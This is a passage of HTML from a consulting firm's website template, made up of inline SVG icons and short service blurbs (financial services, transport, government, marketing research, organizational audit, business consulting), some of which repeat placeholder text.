		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>	        
				<h5><a href="#">Financial Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m456.907 161.731-36.977-14.932c-5.967-2.408-12.25-3.628-18.678-3.628-.03 0-.06 0-.09 0l-24.136.04-20.518-19.911c5.611-3.677 9.33-10.01 9.33-17.204 0-11.34-9.227-20.567-20.567-20.567h-26.483c-.377 0-.745.037-1.107.091l-83.802-81.325c-2.83-2.748-6.562-4.263-10.51-4.267l-42.989-.028c-.002 0-.004 0-.005 0-3.635 0-7.013 1.96-8.815 5.118-1.804 3.158-1.774 7.065.075 10.194l75.651 128.099-41.77.065c-1.196.001-2.404.092-3.59.27-.059.009-.118.018-.177.029l-70.077 12.26-49.75-37.177c-2.049-1.533-4.583-2.376-7.139-2.376-.008 0-.016 0-.023 0l-24.191.042c-3.835.008-7.347 2.111-9.164 5.488s-1.637 7.465.468 10.667l34.021 51.798-33.842 51.918c-2.094 3.213-2.258 7.302-.427 10.673 1.827 3.363 5.337 5.45 9.161 5.45h.021l24.19-.042c2.566-.005 5.106-.857 7.149-2.397l49.624-37.352 70.119 12.016c.061.011.123.02.185.029 1.18.171 2.397.244 3.577.257l41.861-.065-37.682 63.807c-6.849-3.421-10.843-6.886-12.607-8.651-1.956-1.955-3.795-4.086-5.467-6.335-3.195-4.301-8.101-6.773-13.46-6.787-.015 0-.028 0-.042 0-5.355 0-10.271 2.457-13.49 6.745-1.672 2.226-3.536 4.371-5.544 6.377-6.604 6.605-22.881 17.722-57.691 17.975l-11.326.082c-6.876.05-12.471 5.685-12.471 12.562v40.948c0 4.109 3.33 7.439 7.439 7.439s7.439-3.33 7.439-7.439v-38.647l9.027-.066c40.116-.292 59.888-14.117 68.103-22.331 2.501-2.501 4.829-5.181 6.922-7.967.521-.694 1.22-.8 1.593-.8h.005c.445.002 1.075.139 1.556.786 2.104 2.828 4.421 5.513 6.886 7.979 6.615 6.614 26.491 22.031 68.105 22.333l9.027.066v73.838c0 14.933-3.471 29.913-10.038 43.322s-16.273 25.336-28.07 34.493l-37.26 28.918c-2.961 2.297-6.503 3.511-10.245 3.511s-7.284-1.214-10.243-3.51l-37.261-28.919c-11.796-9.156-21.503-21.083-28.07-34.493-6.566-13.409-10.038-28.389-10.038-43.322 0-4.109-3.33-7.439-7.439-7.439s-7.439 3.33-7.439 7.439c0 17.188 3.995 34.432 11.554 49.866 7.559 15.435 18.731 29.163 32.308 39.702l37.262 28.919c5.513 4.278 12.39 6.635 19.364 6.635s13.852-2.357 19.366-6.636l37.261-28.918c13.578-10.538 24.749-24.267 32.308-39.702s11.554-32.678 11.554-49.866v-76.137c0-6.877-5.595-12.511-12.471-12.562l-11.326-.082c-12.598-.091-22.805-1.715-30.964-3.98l40.855-69.179 91.634-.143-61.47 59.654c-2.947 2.861-3.018 7.57-.157 10.519 1.459 1.502 3.398 2.258 5.339 2.258 1.866 0 3.735-.698 5.18-2.101l10.856-10.535h29.081c11.34 0 20.567-9.226 20.567-20.566 0-7.553-4.105-14.151-10.19-17.727l22.191-21.535 23.463-.037c6.462-.012 12.773-1.254 18.756-3.695l36.925-15.059c9.181-3.745 14.875-12.23 14.857-22.145-.011-9.916-5.734-18.383-14.927-22.095zm-111.636 96.602c3.137 0 5.69 2.552 5.69 5.69 0 3.136-2.552 5.689-5.69 5.689h-13.751l11.724-11.378h2.027zm0-157.927c3.137 0 5.69 2.552 5.69 5.69 0 3.137-2.552 5.69-5.69 5.69h-.629l-11.726-11.379h12.355zm106.094 91.789-36.925 15.059c-4.2 1.712-8.628 2.585-13.163 2.593l-195.645.306c-.003 0-.007 0-.01 0-.442 0-.886-.03-1.325-.09l-73.178-12.541c-2.016-.346-4.092.156-5.73 1.389l-51.403 38.691-14.976.025 32.007-49.102c1.615-2.477 1.609-5.675-.015-8.146l-32.177-48.991 14.975-.025 51.538 38.513c1.643 1.226 3.719 1.72 5.734 1.369l73.138-12.796c.438-.062.882-.093 1.325-.094l113.263-.177c4.109-.007 7.434-3.342 7.427-7.45-.007-4.105-3.336-7.427-7.439-7.427-.004 0-.008 0-.012 0l-54.228.085-75.886-128.503 34.698.022c.06 0 .116.022.159.064l132.182 128.277-1.783.003c-4.108.007-7.433 3.343-7.426 7.451.007 4.104 3.336 7.426 7.439 7.426h.013l47.247-.078h.063c4.512 0 8.923.857 13.109 2.546l36.976 14.931c5.212 2.105 5.625 6.904 5.628 8.325 0 1.421-.396 6.222-5.6 8.345z"></path><path d="m234.902 173.999c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.325-4.324-9.639-9.649-9.635z"></path><path d="m270.583 173.976c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.324-4.323-9.638-9.649-9.635z"></path><path d="m305.624 173.954c-5.325.003-9.639 4.323-9.636 9.648s4.323 9.639 9.648 9.635c5.325-.003 9.639-4.323 9.635-9.648-.003-5.325-4.322-9.639-9.647-9.635z"></path><path d="m341.305 173.931c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.005-5.324-4.324-9.638-9.649-9.635z"></path><path d="m150.203 316.284c-10.855 3.962-22.954 6.715-35.961 8.183-5.408.611-9.486 5.179-9.486 10.628v51.148c0 27.281 12.36 52.522 33.911 69.248l32.996 25.608c1.932 1.501 4.247 2.251 6.562 2.251s4.629-.75 6.559-2.249l32.997-25.61c21.551-16.726 33.912-41.965 33.912-69.248v-51.148c0-5.45-4.08-10.02-9.487-10.628-13.006-1.467-25.105-4.221-35.96-8.183-7.22-2.635-13.734-5.768-19.359-9.314-5.262-3.318-12.062-3.317-17.324-.001-5.627 3.546-12.14 6.681-19.36 9.315zm28.749 3.271c6.519 4.109 13.986 7.71 22.193 10.706 10.908 3.98 22.892 6.847 35.67 8.534v47.448c0 22.652-10.262 43.608-28.157 57.495l-30.435 23.621-30.435-23.621c-17.894-13.888-28.156-34.843-28.156-57.495v-47.448c12.779-1.687 24.761-4.553 35.67-8.534 8.209-2.996 15.676-6.598 22.193-10.706.449-.283 1.008-.283 1.457 0z"></path><path d="m145.068 374.175c-3.261 2.498-3.88 7.167-1.382 10.429l23.844 31.134c1.397 1.823 3.557 2.899 5.854 2.915h.051c2.278 0 4.431-1.044 5.843-2.835l43-54.567c2.543-3.226 1.989-7.904-1.239-10.446-3.224-2.543-7.904-1.988-10.446 1.239l-37.073 47.046-18.023-23.533c-2.497-3.26-7.164-3.879-10.429-1.382z"></path></g></svg>	        
				<h5><a href="#">Airlines & Transport</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Government Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Marketing Research</a></h5>				<p>Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)</p>			
        			<a href="#"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Organizational Audit</a></h5>				<p>Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.</p>			
        			<a href="#"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
        			<a href="#"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
